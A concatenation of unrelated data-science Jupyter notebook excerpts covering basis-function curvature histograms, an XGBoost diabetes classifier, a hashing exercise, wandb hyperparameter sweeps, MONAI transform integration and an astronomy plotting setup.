analyzer.pop_proj_datapoints = full_pop_proj_datapoints[slice_indices,:] # slice grid
analyzer.pop_datapoints = [None,]*analyzer.num_orthogonal
for pop_idx, tmp_bf_id1 in enumerate(orthogonal_list):
tmp_bf1 = analyzer.bf_stats["basis_functions"][tmp_bf_id1].reshape((analyzer.model_params.num_pixels))
tmp_bf1 /= np.linalg.norm(tmp_bf1)
tmp_proj_matrix, v = analyzer.bf_projections(analyzer.bf0, tmp_bf1)
analyzer.pop_datapoints[pop_idx] = np.dot(analyzer.pop_proj_datapoints, tmp_proj_matrix)#[slice_indices,:]
analyzer.pop_datapoints = np.reshape(np.stack(analyzer.pop_datapoints, axis=0),
[analyzer.num_orthogonal*analyzer.pop_num_imgs, analyzer.model_params.num_pixels])
analyzer.pop_datapoints = dp.reshape_data(analyzer.pop_datapoints, flatten=False)[0]
analyzer.pop_datapoints = {"test": Dataset(analyzer.pop_datapoints, lbls=None,
ignore_lbls=None, rand_state=analyzer.rand_state)}
#analyzer.pop_datapoints = analyzer.model.preprocess_dataset(analyzer.pop_datapoints,
# params={"whiten_data":analyzer.model_params.whiten_data,
# "whiten_method":analyzer.model_params.whiten_method,
# "whiten_batch_size":10})
analyzer.pop_datapoints = analyzer.model.reshape_dataset(analyzer.pop_datapoints, analyzer.model_params)
#analyzer.pop_datapoints["test"].images /= np.max(np.abs(analyzer.pop_datapoints["test"].images))
#analyzer.pop_datapoints["test"].images *= 10#analyzer.analysis_params.input_scale
for analyzer in analyzer_list:
pop_activations = analyzer.compute_activations(analyzer.pop_datapoints["test"].images)[:, analyzer.bf_id0]
pop_activations = pop_activations.reshape([analyzer.num_orthogonal, analyzer.pop_num_imgs])
analyzer.pop_norm_activity = pop_activations / (np.amax(np.abs(pop_activations)) + 0.0001)
"""
* Construct the set of unit-length bases that are orthogonal to B0 (there should be B0.size-1 of them)
* Construct a line of data points in each plane defined by B0 and a given orthogonal basis
* Project the data points into image space, compute activations, plot activations
"""
for analyzer in analyzer_list:
analyzer.rand_pop_num_imgs = 100
analyzer.rand_num_orthogonal = analyzer.bf_stats["num_inputs"]-1
pop_x_pts = np.linspace(-2.0, 2.0, int(analyzer.rand_pop_num_imgs))
pop_y_pts = np.linspace(-2.0, 2.0, int(analyzer.rand_pop_num_imgs))
pop_X, pop_Y = np.meshgrid(pop_x_pts, pop_y_pts)
full_rand_pop_proj_datapoints = np.stack([pop_X.reshape(analyzer.rand_pop_num_imgs**2),
pop_Y.reshape(analyzer.rand_pop_num_imgs**2)], axis=1) # construct a grid
# find a location to take a slice
x_target = pop_x_pts[int(analyzer.bf0_slice_scale*analyzer.rand_pop_num_imgs)] # index into pop_x_pts, matching the slice indexing above
slice_indices = np.where(full_rand_pop_proj_datapoints[:,0]==x_target)[0]
analyzer.rand_pop_proj_datapoints = full_rand_pop_proj_datapoints[slice_indices,:] # slice grid
orth_col_matrix = analyzer.bf0.T[:,None]
analyzer.rand_pop_datapoints = [None,]*analyzer.rand_num_orthogonal
for pop_idx in range(analyzer.rand_num_orthogonal):
v = find_orth_vect(orth_col_matrix)
orth_col_matrix = np.append(orth_col_matrix, v[:,None], axis=1)
tmp_proj_matrix = np.stack([analyzer.bf0, v], axis=0)
analyzer.rand_pop_datapoints[pop_idx] = np.dot(analyzer.rand_pop_proj_datapoints,
tmp_proj_matrix)
analyzer.rand_pop_datapoints = np.reshape(np.stack(analyzer.rand_pop_datapoints, axis=0),
[analyzer.rand_num_orthogonal*analyzer.rand_pop_num_imgs, analyzer.model_params.num_pixels])
analyzer.rand_pop_datapoints = dp.reshape_data(analyzer.rand_pop_datapoints, flatten=False)[0]
analyzer.rand_pop_datapoints = {"test": Dataset(analyzer.rand_pop_datapoints, lbls=None,
ignore_lbls=None, rand_state=analyzer.rand_state)}
#analyzer.rand_pop_datapoints = analyzer.model.preprocess_dataset(analyzer.rand_pop_datapoints,
# params={"whiten_data":analyzer.model.params.whiten_data,
# "whiten_method":analyzer.model.params.whiten_method,
# "whiten_batch_size":10})
analyzer.rand_pop_datapoints = analyzer.model.reshape_dataset(analyzer.rand_pop_datapoints,
analyzer.model_params)
#analyzer.rand_pop_datapoints["test"].images /= np.max(np.abs(analyzer.rand_pop_datapoints["test"].images))
#analyzer.rand_pop_datapoints["test"].images *= 10# analyzer.analysis_params.input_scale
for analyzer in analyzer_list:
rand_pop_activations = analyzer.compute_activations(analyzer.rand_pop_datapoints["test"].images)[:,
analyzer.bf_id0]
rand_pop_activations = rand_pop_activations.reshape([analyzer.rand_num_orthogonal, analyzer.rand_pop_num_imgs])
analyzer.rand_pop_norm_activity = rand_pop_activations / (np.amax(np.abs(rand_pop_activations)) + 0.0001)
for analyzer in analyzer_list:
analyzer.bf_coeffs = [
np.polynomial.polynomial.polyfit(analyzer.pop_proj_datapoints[:,1],
analyzer.pop_norm_activity[orthog_idx,:], deg=2)
for orthog_idx in range(analyzer.num_orthogonal)]
analyzer.bf_fits = [
np.polynomial.polynomial.polyval(analyzer.pop_proj_datapoints[:,1], coeff)
for coeff in analyzer.bf_coeffs]
analyzer.bf_curvatures = [np.polynomial.polynomial.polyder(coeff, m=2) for coeff in analyzer.bf_coeffs] # differentiate the fit coefficients, not the evaluated curve
analyzer.rand_coeffs = [np.polynomial.polynomial.polyfit(analyzer.rand_pop_proj_datapoints[:,1],
analyzer.rand_pop_norm_activity[orthog_idx,:], deg=2)
for orthog_idx in range(analyzer.rand_num_orthogonal)]
analyzer.rand_fits = [np.polynomial.polynomial.polyval(analyzer.rand_pop_proj_datapoints[:,1], coeff)
for coeff in analyzer.rand_coeffs]
analyzer.rand_curvatures = [np.polynomial.polynomial.polyder(coeff, m=2) for coeff in analyzer.rand_coeffs] # differentiate the fit coefficients, not the evaluated curve
analyzer_idx = 0
bf_curvatures = np.stack(analyzer_list[analyzer_idx].bf_coeffs, axis=0)[:,2]
rand_curvatures = np.stack(analyzer_list[analyzer_idx].rand_coeffs, axis=0)[:,2]
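# Illustrative check (not part of the original analysis): for a quadratic fit
# c0 + c1*x + c2*x**2 the second derivative is the constant 2*c2, which is why
# the c2 coefficient (index 2 above) serves as the curvature summary.
_x = np.linspace(-1.0, 1.0, 50)
_c = np.polynomial.polynomial.polyfit(_x, 3.0 * _x ** 2, deg=2)
assert np.isclose(_c[2], 3.0)
assert np.isclose(np.polynomial.polynomial.polyder(_c, m=2)[0], 6.0)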
num_bins = 100
bins = np.linspace(-0.2, 0.01, num_bins)
bar_width = np.diff(bins).min()
bf_hist, bin_edges = np.histogram(bf_curvatures.flatten(), bins)
rand_hist, _ = np.histogram(rand_curvatures.flatten(), bins)
bin_left, bin_right = bin_edges[:-1], bin_edges[1:]
bin_centers = bin_left + (bin_right - bin_left)/2
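# Illustrative: bin centers are the midpoints of consecutive bin edges,
# e.g. edges [0, 1, 2] -> centers [0.5, 1.5].
_edges = np.array([0.0, 1.0, 2.0])
assert np.allclose(_edges[:-1] + np.diff(_edges) / 2, [0.5, 1.5])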
fig, ax = plt.subplots(1, figsize=(16,9))
ax.bar(bin_centers, rand_hist, width=bar_width, log=False, color="g", alpha=0.5, align="center",
label="Random Projection")
ax.bar(bin_centers, bf_hist, width=bar_width, log=False, color="r", alpha=0.5, align="center",
label="BF Projection")
ax.set_xticks(bin_left, minor=True)
ax.set_xticks([bin_left[0], bin_left[int(len(bin_left)/2)], 0.0], minor=False)
ax.xaxis.set_major_formatter(FormatStrFormatter("%0.3f"))
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(24)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(24)
ax.set_title("Histogram of Curvatures", fontsize=32)
ax.set_xlabel("Curvature", fontsize=32)
ax.set_ylabel("Count", fontsize=32)
ax.legend(loc=2, fontsize=32)
fig.savefig(analyzer.analysis_out_dir+"/vis/histogram_of_curvatures_bf0id"+str(analyzer.bf_id0)+".png",
transparent=True, bbox_inches="tight", pad_inches=0.01)
plt.show()
```
# Data description & Problem statement:
This dataset is originally from the National Institute of Diabetes and Digestive and Kidney Diseases. The objective of the dataset is to diagnostically predict whether or not a patient has diabetes, based on certain diagnostic measurements included in the dataset. Several constraints were placed on the selection of these instances from a larger database. In particular, all patients here are females at least 21 years old of Pima Indian heritage.
This is a classic supervised binary-classification problem. Given a number of instances, each with certain characteristics (features), we want to build a machine learning model that identifies people affected by type 2 diabetes.
# Workflow:
- Load the dataset, and define the required functions (e.g., for detecting outliers)
- Data cleaning/wrangling: handle outliers, missing data, and duplicate values; encode categorical variables; etc.
- Split the data into training & test parts (use the training part for training & hyperparameter tuning of the model, and the test part for its final evaluation)
# Model Training:
- Build an initial XGBoost model, and evaluate it via a cross-validation (CV) approach
- Use grid search along with cross-validation to find the best hyperparameters of the XGBoost model (Note: I've utilized the SMOTE technique via the imblearn toolbox to synthetically over-sample the minority class and even out the dataset imbalance.)
# Model Evaluation:
- Evaluate the best XGBoost model, with optimized hyperparameters, on the test dataset by calculating:
- AUC score
- Confusion matrix
- ROC curve
- Precision-Recall curve
- Average precision
Finally, calculate the Feature Importance.
```
import sklearn
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import preprocessing
%matplotlib inline
from scipy import stats
import warnings
warnings.filterwarnings("ignore")
# Function to remove outliers (all rows) by Z-score:
def remove_outliers(X, y, name, thresh=3):
L=[]
for name in name:
drop_rows = X.index[(np.abs(X[name] - X[name].mean()) >= (thresh * X[name].std()))]
L.extend(list(drop_rows))
X.drop(np.array(list(set(L))), axis=0, inplace=True)
y.drop(np.array(list(set(L))), axis=0, inplace=True)
print('number of outliers removed : ' , len(L))
df=pd.read_csv('C:/Users/rhash/Documents/Datasets/pima-indian-diabetes/indians-diabetes.csv')
df.columns=['NP', 'GC', 'BP', 'ST', 'I', 'BMI', 'PF', 'Age', 'Class']
# To Shuffle the data:
np.random.seed(42)
df=df.reindex(np.random.permutation(df.index))
df.reset_index(inplace=True, drop=True)
df.info()
df['ST'].replace(0, df[df['ST']!=0]['ST'].mean(), inplace=True)
df['GC'].replace(0, df[df['GC']!=0]['GC'].mean(), inplace=True)
df['BP'].replace(0, df[df['BP']!=0]['BP'].mean(), inplace=True)
df['BMI'].replace(0, df[df['BMI']!=0]['BMI'].mean(), inplace=True)
df['I'].replace(0, df[df['I']!=0]['I'].mean(), inplace=True)
df.head()
X=df.drop('Class', axis=1)
y=df['Class']
# We initially divide the data into training & test folds: we do the Grid-Search only on the training part
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42, stratify=y)
#remove_outliers(X_train, y_train, ['NP', 'GC', 'BP', 'ST', 'I', 'BMI', 'PF', 'Age'], thresh=5)
# Building the Initial Model & Cross-Validation:
import xgboost
from xgboost import XGBClassifier
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import StratifiedKFold
model=XGBClassifier()
kfold=StratifiedKFold(n_splits=4, shuffle=True, random_state=42)
scores=cross_val_score(model, X_train, y_train, cv=kfold)
print(scores, "\n")
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std()))
# Grid-Search for the best model parameters:
# We create a sample_weight list for this imbalanced dataset:
from sklearn.utils.class_weight import compute_sample_weight
sw=compute_sample_weight(class_weight='balanced', y=y_train)
from sklearn.model_selection import GridSearchCV
param={'max_depth':[2, 4, 6, 8], 'min_child_weight':[1, 2, 3], 'gamma': [ 0, 0.05, 0.1], 'subsample':[0.7, 1]}
kfold=StratifiedKFold(n_splits=3, shuffle=True, random_state=42)
grid_search=GridSearchCV(XGBClassifier(), param, cv=kfold, n_jobs=-1, scoring="roc_auc")
grid_search.fit(X_train, y_train, sample_weight=sw)
# Grid-Search report:
G=pd.DataFrame(grid_search.cv_results_).sort_values("rank_test_score")
G.head(3)
print("Best parameters: ", grid_search.best_params_)
print("Best validation accuracy: %0.2f (+/- %0.2f)" % (np.round(grid_search.best_score_, decimals=2), np.round(G.loc[grid_search.best_index_,"std_test_score" ], decimals=2)))
print("Test score: ", np.round(grid_search.score(X_test, y_test),2))
from sklearn.metrics import roc_curve, auc, confusion_matrix, classification_report
# Plot a confusion matrix.
# cm is the confusion matrix, names are the names of the classes.
def plot_confusion_matrix(cm, names, title='Confusion matrix', cmap=plt.cm.Blues):
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(names))
plt.xticks(tick_marks, names, rotation=45)
plt.yticks(tick_marks, names)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
names = ["0", "1"]
# Compute confusion matrix
cm = confusion_matrix(y_test, grid_search.predict(X_test))
np.set_printoptions(precision=2)
print('Confusion matrix, without normalization')
print(cm)
# Normalize the confusion matrix by row (i.e by the number of samples in each class)
cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('Normalized confusion matrix')
print(cm_normalized)
plt.figure()
plot_confusion_matrix(cm_normalized, names, title='Normalized confusion matrix')
plt.show()
# Classification report:
report=classification_report(y_test, grid_search.predict(X_test))
print(report)
# ROC curve & auc:
from sklearn.metrics import precision_recall_curve, roc_curve, roc_auc_score, average_precision_score
fpr, tpr, thresholds=roc_curve(np.array(y_test),grid_search.predict_proba(X_test)[:, 1] , pos_label=1)
roc_auc=roc_auc_score(np.array(y_test), grid_search.predict_proba(X_test)[:, 1])
plt.figure()
plt.step(fpr, tpr, color='darkorange', lw=2, label='ROC curve (auc = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', alpha=0.4, lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve')
plt.legend(loc="lower right")
plt.plot([cm_normalized[0,1]], [cm_normalized[1,1]], 'or')
plt.show()
# Precision-Recall trade-off:
precision, recall, thresholds=precision_recall_curve(y_test,grid_search.predict_proba(X_test)[:, 1], pos_label=1)
ave_precision=average_precision_score(y_test,grid_search.predict_proba(X_test)[:, 1])
plt.step(recall, precision, color='navy')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.xlim([0, 1.001])
plt.ylim([0, 1.02])
plt.title('Precision-Recall curve: AP={0:0.2f}'.format(ave_precision))
plt.plot([cm_normalized[1,1]], [cm[1,1]/(cm[1,1]+cm[0,1])], 'ob')
plt.show()
# Feature Importance:
im=XGBClassifier().fit(X,y).feature_importances_
# Sort & Plot:
d=dict(zip(np.array(X.columns), im))
k=sorted(d,key=lambda i: d[i], reverse= True)
[print((i,d[i])) for i in k]
# Plot:
c1=pd.DataFrame(np.array(im), columns=["Importance"])
c2=pd.DataFrame(np.array(X.columns[0:8]),columns=["Feature"])
fig, ax = plt.subplots(figsize=(8,6))
sns.barplot(x="Feature", y="Importance", data=pd.concat([c2,c1], axis=1), color="blue", ax=ax)
```
|
github_jupyter
|
# Simple Hashing and Collisions
This is a very simple example of hashing based on the modulo function and neglecting the issue of collisions mentioned in the lecture.
## Introduction
Good hashing approaches are available in Python for the *Dictionary* data type. However, here is a demonstration of a simple hashing function. The data values have actually been chosen to avoid collisions for the initial size of the hash table.
In this example the data values are their own keys.
## A simple hash function
```
data = [8, 17, 27, 30, 55, 56, 57, 60, 1001, 1002]
```
Some of the values are closely spaced. The aim is to spread them through the hash table in an apparently random way.
The hash table is initially loaded with placeholder 'None' values.
The chosen size is 17 for the demo.
```
hash_table = [None] * 17
tableLength = len(hash_table)
```
The hash function is the modulo (remainder) of the data value divided by the length of the hash_table.
```
def hash_function(value, table_size):
return value % table_size
```
The data values can now be distributed in the hash_table using the hash_function.
```
for value in data:
hash_table[hash_function(value, tableLength)] = value
```
Here they are, notice the function has distributed them through the table.
```
print(hash_table)
```
A value can be retrieved from the table by applying the hash function, but in this case the values are their own keys, so this does not appear very useful.
```
print(hash_table[hash_function(27, tableLength)])
```
There is not much space for additional values in this case without collisions. These occur when the hash_function maps a new key to the same slot as an existing one.
One way to minimize collisions is to make a better choice for the hashing function. For example, it might be better to use a large prime number for the modulo function in preference to the tableLength value *e.g.* for a 1000-slot table use the prime 997.
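A tiny experiment, not part of the original notebook, showing why: when the keys share a common factor with the table size, a composite modulus maps them onto only a few slots, while a prime modulus spreads them out (`count_collisions` is a helper written just for this illustration):

```python
def count_collisions(keys, table_size):
    """Count keys that hash (key % table_size) into an already-used slot."""
    seen = set()
    collisions = 0
    for key in keys:
        slot = key % table_size
        if slot in seen:
            collisions += 1
        seen.add(slot)
    return collisions

keys = [i * 100 for i in range(50)]   # keys sharing a factor with 1000
print(count_collisions(keys, 1000))   # composite size: 40 collisions
print(count_collisions(keys, 997))    # prime size: 0 collisions
```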
A fully functional hash_table would include one of the standard methods for dealing with collisions. The overhead of dealing with collisions decreases the hashing performance from its initial O(1). For retrieving data, the process is slowed down by the extra steps needed when a slot has been assigned to multiple data values.
The overhead increases as the *'load factor'* for the hash table increases. The *load factor* (often called $\alpha$) is the proportion of the slots that have values loaded into them.
So for the demo with the initial values above there are 10 data values in 17 slots: a load factor of 10/17, or about 0.59.
For the simple linear addressing method of dealing with collisions the big O performance of the hashing varies as:
$O$ = 1 + 1/(1-$\alpha$)<sup>2</sup>
(ref. Sedgewick, R. (2003) Linear probing. p615, *Algorithms in Java*, Addison Wesley)
For low $\alpha$, such as occurs with small numbers of data elements in a large hashing table, the O(1) performance will not be degraded by the 1/(1-$\alpha$)<sup>2</sup> term in this expression.
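Before plotting, the expression can be checked numerically (a quick sketch using the formula in the form given above; the plotting itself is the task that follows):

```python
def big_o(alpha):
    """Approximate cost from the expression used above: 1 + 1/(1-alpha)^2."""
    return 1 + 1 / (1 - alpha) ** 2

for alpha in (0.1, 0.5, 0.9):
    print(alpha, big_o(alpha))   # the cost grows sharply as alpha approaches 1
```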
**To see the form of this expression with increasing $\alpha$ your job is to plot the function as the load factor approaches 1. You should do this with matplotlib. The next section shows you how to plot a function.**
## Plotting a function with matplotlib
This is a simple example showing how we can plot the function $y$ = $x$<sup>2</sup> for $x$ in the range -4 to 4:
```
# This line configures matplotlib to show figures embedded in the notebook
# It uses the IPython inline 'magic' syntax
%matplotlib inline
# standard import
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(start=-4., stop=4.) # Return evenly spaced numbers over a specified interval.
y = x**2
plt.figure()
plt.plot(x,y)
plt.title('a quadratic function')
plt.xlabel('x axis label')
plt.ylabel('y axis label')
plt.show()
```
## Your task
Plot how the big O performance of the hashing varies with the load factor $\alpha$, according to the Sedgewick formula above.
Consider what is a good range to use for $\alpha$ in the plot and make sure you label both the plot and the axes.
Please note that you will need to have produced the plot to answer question 12 of the
<a href='https://canvas.anglia.ac.uk/courses/15139/assignments/88350'>TW1 quiz</a>
```
# your code for the plot
```
You should notice that the plot shows that linear addressing has a strikingly non-linear loss of performance as the hash table load factor increases.
However, a small load factor is also an inefficient use of memory space. As a result, many more sophisticated methods of dealing with collisions have been devised which have better performance at higher load factors.
|
github_jupyter
|
```
# Select TensorFlow 2.0 environment (works only on Colab)
%tensorflow_version 2.x
# Install wandb (ignore if already done)
!pip install wandb
# Authorize wandb
!wandb login
# Imports
from tensorflow.keras.models import *
from tensorflow.keras.layers import *
from wandb.keras import WandbCallback
import tensorflow as tf
import numpy as np
import wandb
import time
# Fix the random generator seeds for better reproducibility
tf.random.set_seed(67)
np.random.seed(67)
# Load the dataset
fashion_mnist = tf.keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# Scale the pixel values of the images to the range [0, 1]
train_images = train_images / 255.0
test_images = test_images / 255.0
# Reshape the pixel values so that they are compatible with
# the conv layers
train_images = train_images.reshape(-1, 28, 28, 1)
test_images = test_images.reshape(-1, 28, 28, 1)
# Specify the labels of the FashionMNIST dataset; they will
# be needed later 😉
labels = ["T-shirt/top","Trouser","Pullover","Dress","Coat",
"Sandal","Shirt","Sneaker","Bag","Ankle boot"]
METHOD = 'bayes' # change to 'random' or 'bayes' when necessary and rerun
def train():
# Prepare data tuples
(X_train, y_train) = train_images, train_labels
(X_test, y_test) = test_images, test_labels
# Default values for hyper-parameters we're going to sweep over
configs = {
'layers': 128,
'batch_size': 64,
'epochs': 5,
'method': METHOD
}
# Initialize a new wandb run
wandb.init(project='hyperparameter-sweeps-comparison', config=configs)
# Config is a variable that holds and saves hyperparameters and inputs
config = wandb.config
# Add the config items to wandb
if wandb.run:
wandb.config.update({k: v for k, v in configs.items() if k not in dict(wandb.config.user_items())})
# Define the model
model = Sequential([
Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)),
MaxPooling2D((2,2)),
Conv2D(64, (3, 3), activation='relu'),
MaxPooling2D((2,2)),
Conv2D(64, (3, 3), activation='relu'),
GlobalAveragePooling2D(),
Dense(config.layers, activation=tf.nn.relu),
Dense(10, activation='softmax')
])
# Compile the model
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# Train the model
model.fit(X_train, y_train,
epochs=config.epochs,
batch_size=config.batch_size,
validation_data=(X_test, y_test),
callbacks=[WandbCallback(data_type="image",
validation_data=(X_test, y_test), labels=labels)])
# A function to specify the tuning configuration; it also
# returns a sweep id (required for running the sweep)
def get_sweep_id(method):
sweep_config = {
'method': method,
'metric': {
'name': 'accuracy',
'goal': 'maximize'
},
'parameters': {
'layers': {
'values': [32, 64, 96, 128, 256]
},
'batch_size': {
'values': [32, 64, 96, 128]
},
'epochs': {
'values': [5, 10, 15]
}
}
}
sweep_id = wandb.sweep(sweep_config, project='hyperparameter-sweeps-comparison')
return sweep_id
# Create a sweep for *grid* search
sweep_id = get_sweep_id('grid')
# Run the sweep
wandb.agent(sweep_id, function=train)
# Create a sweep for *random* search (run METHOD cell first and then train())
sweep_id = get_sweep_id('random')
# Run the sweep
wandb.agent(sweep_id, function=train)
# Create a sweep for *Bayesian* search (run METHOD cell first and then train())
sweep_id = get_sweep_id('bayes')
# Run the sweep
wandb.agent(sweep_id, function=train)
```
|
github_jupyter
|
# Integrate 3rd party transforms into a MONAI program
This tutorial shows how to integrate 3rd party transforms into a MONAI program.
It mainly shows transforms from `BatchGenerator`, `TorchIO`, `Rising` and `ITK`.
```
! pip install batchgenerators==0.20.1
! pip install torchio==0.16.21
! pip install rising==0.2.0
! pip install itk==5.1.0
# Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import glob
import numpy as np
import matplotlib.pyplot as plt
from monai.transforms import \
LoadNiftid, AddChanneld, ScaleIntensityRanged, CropForegroundd, \
Spacingd, Orientationd, SqueezeDimd, ToTensord, adaptor, Compose
import monai
from monai.utils import set_determinism
from batchgenerators.transforms.color_transforms import ContrastAugmentationTransform
from torchio.transforms import RescaleIntensity
from rising.random import DiscreteParameter
from rising.transforms import Mirror
from itk import median_image_filter
```
## Set MSD Spleen dataset path
The Spleen dataset can be downloaded from http://medicaldecathlon.com/.
```
data_root = '/workspace/data/medical/Task09_Spleen'
train_images = sorted(glob.glob(os.path.join(data_root, 'imagesTr', '*.nii.gz')))
train_labels = sorted(glob.glob(os.path.join(data_root, 'labelsTr', '*.nii.gz')))
data_dicts = [{'image': image_name, 'label': label_name}
for image_name, label_name in zip(train_images, train_labels)]
```
## Set deterministic training for reproducibility
```
set_determinism(seed=0)
```
## Setup MONAI transforms
```
monai_transforms = [
LoadNiftid(keys=['image', 'label']),
AddChanneld(keys=['image', 'label']),
Spacingd(keys=['image', 'label'], pixdim=(1.5, 1.5, 2.), mode=('bilinear', 'nearest')),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
CropForegroundd(keys=['image', 'label'], source_key='image')
]
```
## Setup BatchGenerator transforms
Note:
1. BatchGenerator transforms take their input as `**data`, so they can't be composed with MONAI transforms directly; use `adaptor`.
2. BatchGenerator expects data of shape [B, C, H, W, D], while MONAI uses [C, H, W, D].
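The two notes above can be mimicked with a plain-numpy sketch (illustrative only; the actual notebook relies on MONAI's `adaptor` and `AddChanneld`). `batchify` and `identity_transform` are hypothetical names invented for this demo:

```python
import numpy as np

def batchify(transform):
    """Wrap a transform expecting **data of shape [B, C, H, W, D] so it can
    be used in a chain passing dicts of arrays of shape [C, H, W, D]."""
    def wrapper(data):
        batched = {k: v[np.newaxis] for k, v in data.items()}  # add batch dim
        out = transform(**batched)                             # **data call style
        return {k: v[0] for k, v in out.items()}               # drop batch dim
    return wrapper

def identity_transform(**data):   # stand-in for a BatchGenerator transform
    return data

sample = {'image': np.zeros((1, 4, 4, 4))}   # [C, H, W, D]
result = batchify(identity_transform)(sample)
print(result['image'].shape)                 # shape preserved: (1, 4, 4, 4)
```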
```
batch_generator_transforms = ContrastAugmentationTransform(data_key='image')
```
## Setup TorchIO transforms
Note:
1. TorchIO specifies several keys internally; use `adaptor` if they conflict with yours.
2. There are few examples or tutorials, so it is hard to get started quickly.
3. The TorchIO transforms depend on many TorchIO modules (Subject, Image, ImageDataset, etc.), so supporting MONAI dict input data is not easy.
4. It can handle PyTorch Tensor data (shape: [C, H, W, D]) directly, so it is used to handle Tensors in this tutorial.
5. If the input data is a Tensor, it can't support the dict type; use `adaptor`.
```
torchio_transforms = RescaleIntensity(out_min_max=(0., 1.), percentiles=(0.05, 99.5))
```
## Setup Rising transforms
Note:
1. Rising transforms inherit from PyTorch `nn.Module` and expect PyTorch Tensor input, so they can only be applied after `ToTensor`.
2. Rising expects data of shape [B, C, H, W, D], while MONAI uses [C, H, W, D].
3. Rising transforms take their input as `**data`; use `adaptor`.
```
rising_transforms = Mirror(dims=DiscreteParameter((0, 1, 2)), keys=['image', 'label'])
```
## Setup ITK transforms
Note:
1. The ITK transform functions take several args (not only `data`), so set the args in a wrapper before `Compose`.
2. If the input data is Numpy, ITK can't support the dict type; a wrapper is needed to convert the format.
3. ITK expects input of shape [H, W, [D]], so process every channel separately and stack the results.
```
def itk_transforms(x):
smoothed = list()
for channel in x['image']:
smoothed.append(median_image_filter(channel, radius=2))
x['image'] = np.stack(smoothed)
return x
```
## Compose all transforms
```
transform = Compose(monai_transforms + [
itk_transforms,
# add another dim as BatchGenerator and Rising expects shape [B, C, H, W, D]
AddChanneld(keys=['image', 'label']),
adaptor(batch_generator_transforms, {'image': 'image'}),
ToTensord(keys=['image', 'label']),
adaptor(rising_transforms, {'image': 'image', 'label': 'label'}),
# squeeze shape from [B, C, H, W, D] to [C, H, W, D] for TorchIO transforms
SqueezeDimd(keys=['image', 'label'], dim=0),
adaptor(torchio_transforms, 'image', {'image': 'data'})
])
```
## Check transforms in DataLoader
```
check_ds = monai.data.Dataset(data=data_dicts, transform=transform)
check_loader = monai.data.DataLoader(check_ds, batch_size=1)
check_data = monai.utils.misc.first(check_loader)
image, label = (check_data['image'][0][0], check_data['label'][0][0])
print(f"image shape: {image.shape}, label shape: {label.shape}")
# plot the slice [:, :, 80]
plt.figure('check', (12, 6))
plt.subplot(1, 2, 1)
plt.title('image')
plt.imshow(image[:, :, 80], cmap='gray')
plt.subplot(1, 2, 2)
plt.title('label')
plt.imshow(label[:, :, 80])
plt.show()
```
|
github_jupyter
|
```
import matplotlib,aplpy
from astropy.io import fits
from general_functions import *
import matplotlib.pyplot as plt
font = {'size' : 14, 'family' : 'serif', 'serif' : 'cm'}
plt.rc('font', **font)
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['lines.linewidth'] = 1
plt.rcParams['axes.linewidth'] = 1
#Set to true to save pdf versions of figures
save_figs = True
```
The files used to make the following plot are:
```
r_image_decals = 'HCG16_DECaLS_r_cutout.fits'
grz_image_decals = 'HCG16_DECaLS_cutout.jpeg'
obj_list = ['NW_clump','E_clump','S_clump']
#+'_mom0th.fits' or +'_mom1st.fits'
```
1. An $r$-band DECaLS fits image of HCG 16.
2. A combined $grz$ jpeg image from DECaLS covering exactly the same field.
These files were downloaded directly from the [DECaLS public website](http://legacysurvey.org/). The exact parameters defining the region and pixel size of these images are contained in the [pipeline.yml](pipeline.yml) file.
3. Moment 0 and 1 maps of each candidate tidal dwarf galaxy.
The moment 0 and 1 maps of the galaxies were generated in the *imaging* step of the workflow using CASA. The exact steps are included in the [imaging.py](casa/imaging.py) script. The masks used to make these moment maps were constructed manually using the [SlicerAstro](http://github.com/Punzo/SlicerAstro) software package. They were downloaded along with the raw data from the EUDAT service [B2SHARE](http://b2share.eudat.eu) at the beginning of the workflow execution. The exact location of the data is given in the [pipeline.yml](pipeline.yml) file.
Make moment 0 contour overlays and moment 1 maps.
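`mask_mom1` is imported from `general_functions` and not shown in this notebook; a hypothetical numpy-only sketch of the clipping it presumably performs (blanking the moment 1 velocity map wherever the moment 0 flux falls below `level`) might look like:

```python
import numpy as np

def clip_moment1(mom0, mom1, level):
    """Blank moment 1 pixels where the moment 0 map is below a flux level.
    Hypothetical stand-in for mask_mom1; NaN pixels plot as blank."""
    clipped = mom1.astype(float).copy()
    clipped[mom0 < level] = np.nan
    return clipped

mom0 = np.array([[0.05, 0.2], [0.3, 0.01]])        # integrated flux
mom1 = np.array([[3530., 3550.], [3560., 3580.]])  # velocity field [km/s]
out = clip_moment1(mom0, mom1, level=0.1)
print(out)   # velocities survive only where mom0 >= 0.1
```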
```
#Initialise figure using DECaLS r-band image
f = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])
#Display DECaLS grz image
f.show_rgb(grz_image_decals)
